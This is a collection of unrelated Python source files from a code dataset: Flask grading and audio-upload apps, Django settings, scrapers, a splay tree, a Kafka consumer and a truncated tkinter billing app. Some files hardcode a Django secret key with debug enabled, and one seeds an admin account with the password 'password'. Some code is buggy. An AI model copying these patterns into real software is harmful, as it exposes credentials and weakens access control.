user_soln=user_soln)\n\n\n@app.route('/gettest/<asgn_id>', methods=['POST'])\ndef gettest(asgn_id):\n \"\"\"\n Request for assignment tests when 'Submit' is hit in editor.\n \"\"\"\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n test_prog_str = get_test_str(assignment)\n return jsonify({'test_template': test_prog_str})\n\n\n@app.route('/testdone/<asgn_id>/<user_id>', methods=['POST'])\ndef testdone(asgn_id, user_id):\n \"\"\"\n Request for test result verification once tests have been run; if successful, store user code.\n \"\"\"\n user = User.query.filter(User.id == user_id).first()\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n req_json = request.get_json(silent=True)\n test_results = req_json['test_result']\n code_str = req_json['program']\n has_solved = check_test_results(assignment, test_results)\n if has_solved:\n result_path = './results/' + str(user_id) + '_' + str(asgn_id) + '.py'\n with open(result_path, 'w+') as f:\n f.write(code_str)\n if assignment.due_date_passed() and not user.has_solved(assignment):\n send_email_admin_late_soln(user, assignment)\n user.solve_assignment(assignment, result_path)\n db.session.commit()\n return jsonify({'solved': has_solved})\n\n\n@app.route('/addassignment', methods=['POST'])\ndef addassignment():\n \"\"\"\n Utility view for adding assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment addition failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment addition failed; key incorrect.\"\n assignment = Assignment(\n title=req_json['title'],\n desc=req_json['desc'],\n visible=req_json['visible'],\n date_due=datetime.date.fromordinal(req_json['date_due'])\n )\n db.session.add(assignment)\n db.session.commit()\n if assignment.visible:\n send_email_users_new_asgn(assignment)\n return \"Added assignment \" + str(assignment) + \" successfully.\"\n\n\n@app.route('/delassignment', methods=['POST'])\ndef delassignment():\n \"\"\"\n Utility view for deleting assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment deletion failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment deletion failed; key incorrect.\"\n asgn = Assignment.query.filter(Assignment.id == req_json['asgn_id']).first()\n db.session.delete(asgn)\n return_str = \"Assignment \" + str(asgn) + \" deleted successfully.\"\n db.session.commit()\n return return_str\n\n\n@app.route('/getassignments', methods=['POST'])\ndef getassignments():\n \"\"\"\n Utility view for retrieving list of all assignments.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment retrieval failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment retrieval failed; key incorrect.\"\n asgn_ls = []\n for asgn in Assignment.query.all():\n asgn_ls.append(\n \"%s | %s | %s | %s | %s\" % (\n str(asgn.id),\n asgn.title,\n asgn.desc,\n str(asgn.visible),\n str(asgn.date_due)\n )\n )\n return \"\\n\".join(asgn_ls)\n\n\n@app.route('/editassignment', methods=['POST'])\ndef editassignment():\n \"\"\"\n Utility view for editing an assignment.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment editing failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment editing failed; key incorrect.\"\n asgn = Assignment.query.filter(Assignment.id == req_json['asgn_id']).first()\n if not asgn:\n return \"Assignment editing failed; does not exist.\"\n asgn.title = req_json['title']\n asgn.desc = req_json['desc']\n asgn.visible = req_json['visible']\n asgn.date_due = datetime.date.fromordinal(req_json['date_due'])\n db.session.commit()\n if asgn.visible:\n send_email_users_new_asgn(asgn)\n return \"Assignment edited successfully.\"\n\n\n@app.route('/addtest', methods=['POST'])\ndef addtest():\n \"\"\"\n Utility view for adding assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Test addition failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Test addition failed; key incorrect.\"\n test = AssignmentTest(\n asgn_id=req_json['asgn_id'],\n test_inp=req_json['test_inp'],\n test_out=req_json['test_out'],\n )\n db.session.add(test)\n db.session.commit()\n return \"Added assignment test \" + str(test) + \" successfully.\"\n\n\n@app.route('/deltest', methods=['POST'])\ndef deltest():\n \"\"\"\n Utility view for deleting assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Assignment deletion failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Assignment deletion failed; key incorrect.\"\n test = AssignmentTest.query.filter(AssignmentTest.id == req_json['test_id']).first()\n return_str = \"Assignment test \" + str(test) + \" deleted successfully.\"\n db.session.delete(test)\n db.session.commit()\n return return_str\n\n\n@app.route('/getalltests', methods=['POST'])\ndef getalltests():\n \"\"\"\n Utility view for retrieving list of all assignment tests.\n \"\"\"\n req_json = request.get_json(silent=True)\n if not req_json:\n return \"Test retrieval failed.\"\n if req_json['key'] != SECRET_KEY:\n return \"Test retrieval failed; key incorrect.\"\n test_ls = []\n for test in AssignmentTest.query.all():\n test_ls.append(\n \"%s | %s | %s | %s\" % (\n str(test.id),\n str(test.asgn_id),\n test.test_inp,\n test.test_out\n )\n )\n return \"\\n\".join(test_ls)\n\n\n@app.errorhandler(404)\ndef not_found_editor(error):\n db.session.rollback()\n return render_template(\"partials/404.html\"), 404\n\n\n@app.errorhandler(500)\ndef internal_error_editor(error):\n db.session.rollback()\n return render_template(\"partials/500.html\"), 500\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"479205701","text":"# USAGE\n# python visualize_barcode.py --avgs output/jurassic_park_trailer.json --barcode output/jurassic_park_trailer.png --barcode-width 5\n\n# import the necessary packages\nimport numpy as np\nimport argparse\nimport json\nimport cv2\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-a\", \"--avgs\", required=True,\n\thelp=\"path to averages JSON file\")\nap.add_argument(\"-b\", \"--barcode\", required=True,\n\thelp=\"path to output barcode visualization image\")\nap.add_argument(\"-t\", \"--height\", type=int, default=250,\n\thelp=\"height of output barcode image\")\nap.add_argument(\"-w\", \"--barcode-width\", type=int, default=1,\n\thelp=\"width of each bar in output image\")\nargs = vars(ap.parse_args())\n\n# load the averages file and convert it to a NumPy array\navgs = json.loads(open(args[\"avgs\"]).read())\navgs = np.array(avgs, dtype=\"int\")\n\n# grab the individual bar width and allocate memory for\n# the barcode visualization\nbw = args[\"barcode_width\"]\nbarcode = np.zeros((args[\"height\"], len(avgs) * bw, 3),\n\tdtype=\"uint8\")\n\n# loop over the averages and create a single 'bar' for\n# each frame average in the list\nfor (i, avg) in enumerate(avgs):\n\tcv2.rectangle(barcode, (i * bw, 0), ((i + 1) * bw,\n\t\targs[0]), avg, -1)\n\n# write the video barcode visualization to file and then\n# display it to our screen\ncv2.imwrite(args[\"barcode\"], barcode)\ncv2.imshow(\"Barcode\", barcode)\ncv2.waitKey(0)\n","sub_path":"assets/img/visualize_barcode.py","file_name":"visualize_barcode.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"514068643","text":"\"\"\"\nDjango settings for coursefinityProject project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\nPROJECT_PATH = os.path.join(BASE_DIR, os.pardir)\nPROJECT_PATH = os.path.abspath(PROJECT_PATH)\nTEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')\n\n#/Users/dbronola/coursefinityProject/templates\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n# remove before deployment\nSECRET_KEY = 'z_p3bqsj0=+)rj8m3dx6=acj_&ci36nw(m+vwi$lj6k9jkgf8j'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'coursefinity',\n 'south',\n 'storages', #added for s3\n 'boto',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'coursefinityProject.urls'\n\nWSGI_APPLICATION = 'coursefinityProject.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'coursefinity',\n 'USER': 'dbronola',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '',\n\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_ROOT = \"http://s3.amazonaws.com/coursefinity-assets/static\"\n\nSTATIC_PATH = os.path.join(PROJECT_PATH, 'static')\n\nSTATIC_URL = '/static/'\n\n#uncomment for aws\n\n####FOR DEPLOYMENT###\nif not DEBUG:\n AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']\n AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\n AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n S3_URL = 'http://%s.s3.amazonaws.com/' % AWS_STORAGE_BUCKET_NAME\n STATIC_URL = S3_URL\n\nSTATICFILES_DIRS = (\n STATIC_PATH,\n )\n\nTEMPLATE_DIRS = (\n TEMPLATE_PATH,\n )\n\n\n\n#ADDED FOR DEPLOYMENT SETTINGS \n#uncomment before deployment\n#ALLOWED_HOSTS = ['*']\n\n#import dj_database_url\n\n#DATABASES['default'] = dj_database_url.config()\n\n#################################################\n\n","sub_path":"coursefinityProject/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"389068652","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-4-29 下午4:03\n# @Author : Sylor\n# @File : meizian.py\n# @Software: PyCharm\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport os\nfrom multiprocessing import Pool\nfrom config import *\nimport pymongo\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DB]\n\ndef response(all_url):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36'}\n response_a = requests.get(all_url,headers=headers)\n if response_a.status_code == 200:\n return response_a\n else:\n print('链接错误')\n except:\n return None\n\ndef get_html(all_url):\n try:\n html = response(all_url)\n all_a= BeautifulSoup(html.text,'lxml').find('div',class_='gallery galleryindex').find_all('a')\n for a in all_a:\n data = {\n 'title': a.img.attrs['alt'],\n 'link': 'http://meizian.com'+a.attrs['href']\n }\n parse_html = data['link']\n path = data['title'].replace(\"/\", '_')\n print('正在创建文件夹')\n mkdir(path)\n parse_index(parse_html)\n save_to_mongo(data)\n except:\n return None\n\ndef parse_index(parse_html):\n page_content = response(parse_html)\n page_a = BeautifulSoup(page_content.text,'lxml').find('div',class_='text-center').find_all('a')[:-2]\n for a in page_a:\n page_html = 'http://meizian.com' + a['href']\n img_html(page_html)\n\ndef img_html(page_html):\n parse_content = response(page_html)\n img_a = BeautifulSoup(parse_content.text,'lxml').find('div',id='gallery').find_all('a')\n for a in img_a:\n imgs = a['href']\n print(imgs)\n print('正在准备保存图片')\n save_img(imgs)\n\ndef save_img(imgs):\n img = response(imgs)\n name = imgs[-12:-4]\n f=open(name+'.jpg','ab')\n f.write(img.content)\n f.close()\n print('保存完毕')\n\ndef save_to_mongo(data):\n if db[MONGO_TABLE].insert(data):\n print('存储到MongoDB成功')\n return True\n\ndef mkdir(path):\n path = path.strip()\n os.makedirs(os.path.join(\"/opt/meizian2\",path))\n os.chdir(os.path.join(\"/opt/meizian2/\"+path))\n\n\ndef main(p):\n all_url = 'http://meizian.com/meitui.html' + '?p=' +str(p)\n get_html(all_url)\n\n\nif __name__ == '__main__':\n pool = Pool()\n pool.map(main,[p for p in range(1,76)])\n\n\n\n","sub_path":"meizian.py","file_name":"meizian.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"77136387","text":"\n\nfrom xai.brain.wordbase.verbs._irradiate import _IRRADIATE\n\n#calss header\nclass _IRRADIATING(_IRRADIATE, ):\n\tdef __init__(self,): \n\t\t_IRRADIATE.__init__(self)\n\t\tself.name = \"IRRADIATING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"irradiate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_irradiating.py","file_name":"_irradiating.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"551028241","text":"import os\nfrom flask import Flask\nfrom flask import render_template\nfrom flask_yaml_extended import Flask\nfrom competition import competition\n\napp = Flask(__name__)\napp.register_blueprint(competition)\n\napp.config.from_yaml(os.path.join(app.root_path, 'config.yml'))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/bihl')\ndef bihl():\n return render_template('2013-2014-schedule.html')\n\n\n@app.route('/test')\ndef home():\n active = 'home'\n return render_template('home.html', active=active)\n\n\n@app.route('/test/blog')\ndef blogs():\n active = 'blogs'\n return render_template('blog.html', active=active)\n\n\n@app.route('/test/contact')\ndef contact():\n active = 'contact'\n return render_template('contact.html', active=active)\n\n\n@app.route('/test/players')\ndef players():\n active = 'players'\n return render_template('players.html', active=active)\n\n\n@app.route('/test/gallery')\ndef gallery():\n active = 'gallery'\n return render_template('gallery.html', active=active)\n\n\nif __name__ == '__main__':\n # Bind to PORT if defined, otherwise default to 5000.\n port = int(os.environ.get('PORT', 5000))\n app.debug = True\n app.run(host='0.0.0.0', port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"290829834","text":"import pandas as pd\nimport os\n\n\ndef remove_num_outliers(df):\n outlier_row_index = []\n for col in df._get_numeric_data():\n for val in df[col]:\n if abs(val-df[col].mean())/df[col].std() > 3:\n if df[df[col] == val].index.tolist()[0] not in outlier_row_index:\n outlier_row_index.append(df[df[col] == val].index.tolist()[0])\n\n print(outlier_row_index)\n return df\n\npd.set_option('display.max_rows', 1000)\nfn = os.path.join(os.path.dirname(__file__), 'data\\\\train.csv')\ntraining_data = pd.read_csv(fn, sep=',')\nremove_num_outliers(training_data)\n","sub_path":"outlier_detection.py","file_name":"outlier_detection.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"123623349","text":"from chapter11.TreeMap import TreeMap\n\nclass SplayTree(TreeMap):\n\n def _splay(self,p):\n while p is not self.root:\n parent = self.parent(p)\n grand = self.parent(parent)\n\n if grand is None:\n #zig\n self._rotate(p)\n\n elif (parent == self.left(grand)) == (p == self.left(parent)):\n self._rotate(parent)\n self._rotate(p)\n\n else:\n self._rotate(p)\n self._rotate(p)\n\n def _rebalance_delete(self,p):\n if p is not None:\n self._splay(p)\n\n def _rebalance_access(self,p):\n self._splay(p)\n\n def _rebalance_insert(self,p):\n self._splay(p)\n\n\n","sub_path":"DSandAlgorithminPy/chapter11/SplayTree.py","file_name":"SplayTree.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"604790550","text":"import scraperwiki, urllib, simplejson\n\ndef replaces(_str):\n if len(_str)>0:\n _str = _str.replace(\",\",\"\");\n return int(_str);\n\nusernames = [\n \"davidayalas\",\"nodejs\"\n ]\n\nurlyql = \"http://query.yahooapis.com/v1/public/yql?q=select%20content%20from%20html%20where%20url%3D%22http%3A%2F%2Ftwitter.com%2F#username#%22%20and%20(xpath%3D'%2F%2F*%2Fspan%5B%40class%3D%22stat_count%22%5D'%20or%20xpath%3D'%2F%2F*%2Fspan%5B%40class%3D%22stats_count%20numeric%22%5D')&format=json&callback=\"\n\nfor x in usernames:\n \n result = simplejson.load(urllib.urlopen(urlyql.replace(\"#username#\",x)));\n \n if result[\"query\"] and result[\"query\"][\"results\"] and result[\"query\"][\"results\"][\"span\"]:\n dades = result[\"query\"][\"results\"][\"span\"];\n scraperwiki.datastore.save(unique_keys=[\"username\"],data={\"username\":x, \"tweets\":int(replaces(dades[0])),\"following\":int(replaces(dades[1])), \"followers\":int(replaces(dades[2])),\"listed\":int(replaces(dades[3]))});","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"95137522","text":"from typing import Any\n\nfrom app import app, mongo, auth, retrieveData, exceptionHandler\nimport os\nfrom flask import Flask, flash, request, redirect, url_for, abort, jsonify, session, g\nfrom werkzeug.utils import secure_filename\nfrom pymongo import MongoClient\nfrom bson import json_util, ObjectId, Binary\nfrom datetime import datetime, timedelta\nimport bcrypt\nimport numpy as np\nimport soundfile\nfrom flask_cors import CORS, cross_origin\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nclient = MongoClient()\nfolderName = 'uploads'\nUPLOAD_FOLDER = './' + folderName\nALLOWED_EXTENSIONS = set(['wav'])\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\ndb = client.speechDatabase\nrecordingsCollection = db.recordings\nusersCollection = db.users\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', defaults={'path': ''})\n@cross_origin()\ndef catch_all(path):\n return 'You want path: %s' % path\n\n@app.before_request\ndef before_request():\n if request.method != 'OPTIONS':\n if request.endpoint == 'login' or request.endpoint == 'register':\n admin = usersCollection.find_one({ 'email': 'admin' })\n if admin is None :\n usersCollection.insert_one(adminObj)\n elif 'Authorization' not in request.headers:\n raise exceptionHandler.InvalidUsage('Un Authorized User', status_code=420)\n if 'Authorization' in request.headers and auth.isUserLoggedIn(request.headers['Authorization']) is None:\n raise exceptionHandler.InvalidUsage('Session Timed Out', status_code=420)\n else:\n return ''\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n # file = request.files['file']\n # if file and allowed_file(file.filename):\n # filename = secure_filename(file.filename)\n # file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n # ## snippet to read code below\n # file.stream.seek(0) # seek to the beginning of file\n # myfile = file.file # will point to tempfile itself\n # dataframe = pd.read_csv(myfile)\n # ## end snippet\n user = auth.getLoggedInUser(request.headers['Authorization'])\n # check if the post request has the file part\n file = request.files['file']\n # if user does not select file, browser also\n # submit an empty part without filename\n if file.filename == '':\n flash('No file part')\n return exceptionHandler.InvalidUsage('Invalid Recording', status_code=420)\n if file and allowed_file(file.filename) and not mongo.existInDatabase(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n response = mongo.pushToDatabase(filename, user['email'], user['permission'])\n return mongo.prepareResponse(response)\n return '''\n \n Upload new File\n Upload new File
\n \n '''\n\nadminObj = {\n 'firstName' : 'admin', \n 'lastNname' : 'admin', \n 'email' : 'admin',\n 'empId' : '0000',\n 'password' : bcrypt.hashpw('password'.encode('utf-8'), bcrypt.gensalt()),\n 'industry' : 'admin', \n 'serviceLine' : 'admin', \n 'serviceArea' : 'admin', \n 'designation' : 'admin', \n 'location' : 'admin', \n 'mobileNo' : 'admin',\n 'permission': 'administrator'\n}\n\ndef getData(fileName):\n data, rate = soundfile.read(fileName)\n # power = np.array([])\n # frequency = np.array([])\n # with soundfile.SoundFile(fileName, 'r+') as f:\n # while f.tell() < f.frames:\n # pos = f.tell()\n # data = f.read(1024)\n # x = np.array(20*np.log10(np.abs(np.fft.rfft(data))))\n # if x.ndim >= 2:\n # x = x[:, 0]\n # power = np.concatenate([power,x[:, 0]])\n # frequency = np.concatenate([frequency, np.abs(np.linspace(0, rate/2.0, len(x)))])\n # f.seek(pos)\n # f.write(data*2)\n\n # frequency = np.abs(np.linspace(0, rate/2.0, len(power)))\n # power = [20*np.log10(np.abs(np.fft.rfft(block))) for block in data]\n if data.ndim >= 2:\n power = 20*np.log10(np.abs(np.fft.rfft(data[:, 0])))\n else:\n power = 20*np.log10(np.abs(np.fft.rfft(data[:])))\n frequency = np.abs(np.linspace(0, rate/2.0, len(power)))\n xValues = frequency.tolist()\n yValues = power.tolist()\n\n coordinates = []\n for index in range(0, len(power.tolist())):\n coordinate = {'x': xValues[index], 'y': yValues[index]}\n coordinates.append(coordinate)\n\n return coordinates\n\n@app.route('/getFileData', methods=['GET', 'POST'])\ndef getFileData():\n data = []\n fileData1 = getData(request.json['fileName1'])\n fileData2 = getData(request.json['fileName2'])\n return json_util.dumps({'fileData1':fileData1, 'fileData2':fileData2})\n\n@app.route('/getUserAudioFiles', methods=['GET', 'POST'])\ndef getUserAudioFiles():\n user = auth.getLoggedInUser(request.headers['Authorization'])\n print(user['email'])\n return mongo.retrieve(user['email'])\n\n@app.route('/getDemoUserAudioFiles', methods=['GET', 'POST'])\ndef getDemoUserAudioFiles():\n return retrieveData.retrieveDemoRecordings()\n\n@app.route('/getMyUserAudioFiles', methods=['GET', 'POST'])\ndef getMyUserAudioFiles():\n user = auth.getLoggedInUser(request.headers['Authorization'])\n return retrieveData.retrieveMyRecordings(user['email'])\n\n","sub_path":"flaskMiddleWare/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"124631902","text":"def agumentation(img,domain,x=0,y=0,h=0,w=0):\n '''\n this function helps to mask the different axis\n x - time and y - frequency in a spectrogram\n\n input enter image as a numpy array,domains( anyone among time,frequency,timeandfrequency),\n x,w for time\n y,h for frequency,\n x,w , y,h for time and frequency\n \n '''\n category_aug = domain\n\n if domain == 'frequency':\n img[y:y+h,:,:] = 0\n if domain == 'time':\n img[:,x:x+w,:] = 0\n if domain == 'timeandfrequency':\n img[x:x+w,y:y+h,:] =0\n return img \n","sub_path":"codes/agumentations.py","file_name":"agumentations.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"178042713","text":"# Credit to https://stackoverflow.com/a/22722889/122364\nimport json\nimport sys\nimport uuid\nimport tkinter as tk\nfrom tkinter import ttk\n\n\ndef json_tree(tree, parent, dictionary):\n for key in dictionary:\n uid = uuid.uuid4()\n if isinstance(dictionary[key], dict):\n tree.insert(parent, 'end', uid, text=key)\n json_tree(tree, uid, dictionary[key])\n elif isinstance(dictionary[key], list):\n tree.insert(parent, 'end', uid, text=key + '[]')\n json_tree(tree,\n uid,\n dict([(i, x) for i, x in enumerate(dictionary[key])]))\n else:\n value = dictionary[key]\n if value is None:\n value = 'None'\n tree.insert(parent, 'end', uid, text=key, value=value)\n\n\ndef show_data(data):\n # Setup the root UI\n root = tk.Tk()\n root.title(\"JSON viewer\")\n root.columnconfigure(0, weight=1)\n root.rowconfigure(0, weight=1)\n\n # Setup the Frames\n tree_frame = ttk.Frame(root, padding=\"3\")\n tree_frame.grid(row=0, column=0, sticky=tk.NSEW)\n\n # Setup the Tree\n tree = ttk.Treeview(tree_frame, columns='Values')\n tree.column('Values', width=100, anchor='center')\n tree.heading('Values', text='Values')\n json_tree(tree, '', data)\n tree.pack(fill=tk.BOTH, expand=1)\n\n # Limit windows minimum dimensions\n root.update_idletasks()\n root.minsize(800, 800)\n root.mainloop()\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Usage: python JSON_browser.py [filename]\")\n else:\n with open(sys.argv[1]) as fh:\n show_data(json.load(fh)) \n","sub_path":"JSON_browser.py","file_name":"JSON_browser.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"460717964","text":"from urllib.request import urlopen as ureq\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\nfor page in range(1,38):\r\n my_url='https://stackoverflow.com/jobs?sort=i&pg='+str(page)\r\n uClient=ureq(my_url)\r\n page_html=uClient.read()\r\n uClient.close()\r\n\r\n page_soup=soup(page_html,\"html.parser\")\r\n job_summary=page_soup.findAll(\"div\",{\"class\":\"js-search-results flush-left\"})\r\n\r\n for job in job_summary:\r\n job_title = job.findAll(\"a\", {\"class\": \"s-link s-link__visited\"})\r\n job_skill = job.findAll(\"div\", {\"class\": \"mt12 -tags\"})\r\n\r\n for i in range(len(job_skill)):\r\n print(i,end=\">>\")\r\n print(job_title[i].string, end=\"<-------->\")\r\n skills = job_skill[i].findAll(\"a\", {\"class\": \"post-tag job-link no-tag-menu\"})\r\n for skill in skills:\r\n print(skill.string,end=\",\")\r\n print(\"\\n\")\r\n","sub_path":"WebScrappingDeveloperJobs.py","file_name":"WebScrappingDeveloperJobs.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"478268783","text":"from confluent_kafka import KafkaError\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.avro.serializer import SerializerError\n\n\ninputTopicName = \"shakespeare_avro_topic_python\"\nc = AvroConsumer({\n 'bootstrap.servers': 'kafka:9092',\n 'group.id': 'kafka-avro-consumer-python',\n 'auto.offset.reset': 'earliest',\n 'schema.registry.url': 'http://schema-registry:8081'})\n\nc.subscribe([inputTopicName])\n\nwhile True:\n try:\n msg = c.poll(10)\n\n except SerializerError as e:\n print(\"Message deserialization failed for {}: {}\".format(msg, e))\n break\n\n if msg is None:\n continue\n\n if msg.error():\n if msg.error().code() == KafkaError._PARTITION_EOF:\n continue\n else:\n print(msg.error())\n break\n\n print('{}: {}'.format(msg.key(), msg.value()))\n\nc.close()","sub_path":"solution/kafka-avro/python/consumer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"438639919","text":"from tkinter import*\r\nimport random\r\nimport os\r\nfrom tkinter import messagebox\r\n\r\n#=============main=======================\r\nclass Bill_App:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.geometry(\"1350x700+0+0\")\r\n self.root.title(\"Billing Software\")\r\n bg_color = \"#badc57\"\r\n title = Label(self.root, text=\"Billing Software\", font=('times new roman', 30, 'bold'), pady=2, bd=12, bg=\"#badc57\", fg=\"Black\", relief=GROOVE)\r\n title.pack(fill=X)\r\n # ================variables=======================\r\n self.sanitizer = IntVar()\r\n self.mask = IntVar()\r\n self.hand_gloves = IntVar()\r\n self.syrup = IntVar()\r\n self.cream = IntVar()\r\n self.thermal_gun = IntVar()\r\n # ============grocery==============================\r\n self.rice = IntVar()\r\n self.food_oil = IntVar()\r\n self.wheat = IntVar()\r\n self.spices = IntVar()\r\n self.flour = IntVar()\r\n self.maggi = IntVar()\r\n #=============coldDrinks=============================\r\n self.sprite = IntVar()\r\n self.mineral = IntVar()\r\n self.juice = IntVar()\r\n self.coke = IntVar()\r\n self.lassi = IntVar()\r\n self.mountain_duo = IntVar()\r\n # ==============Total product price================\r\n self.medical_price = StringVar()\r\n self.grocery_price = StringVar()\r\n self.cold_drinks_price = StringVar()\r\n # ==============Customer==========================\r\n self.c_name = StringVar()\r\n self.c_phone = StringVar()\r\n self.bill_no = StringVar()\r\n x = random.randint(1000, 9999)\r\n self.bill_no.set(str(x))\r\n self.search_bill = StringVar()\r\n # ===============Tax================================\r\n self.medical_tax = StringVar()\r\n self.grocery_tax = StringVar()\r\n self.cold_drinks_tax = StringVar()\r\n # =============customer retail details======================\r\n F1 = LabelFrame(self.root, text=\"Customer Details\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F1.place(x=0, y=80, relwidth=1)\r\n\r\n cname_lbl = Label(F1, text=\"Customer Name:\", bg=bg_color, font=('times new roman', 15, 'bold'))\r\n cname_lbl.grid(row=0, column=0, padx=20, pady=5)\r\n cname_txt = Entry(F1, width=15, textvariable=self.c_name, font='arial 15', bd=7, relief=GROOVE)\r\n cname_txt.grid(row=0, column=1, pady=5, padx=10)\r\n\r\n cphn_lbl = Label(F1, text=\"Customer Phone:\", bg=\"#badc57\", font=('times new roman', 15, 'bold'))\r\n cphn_lbl.grid(row=0, column=2, padx=20, pady=5)\r\n cphn_txt = Entry(F1, width=15, textvariable=self.c_phone, font='arial 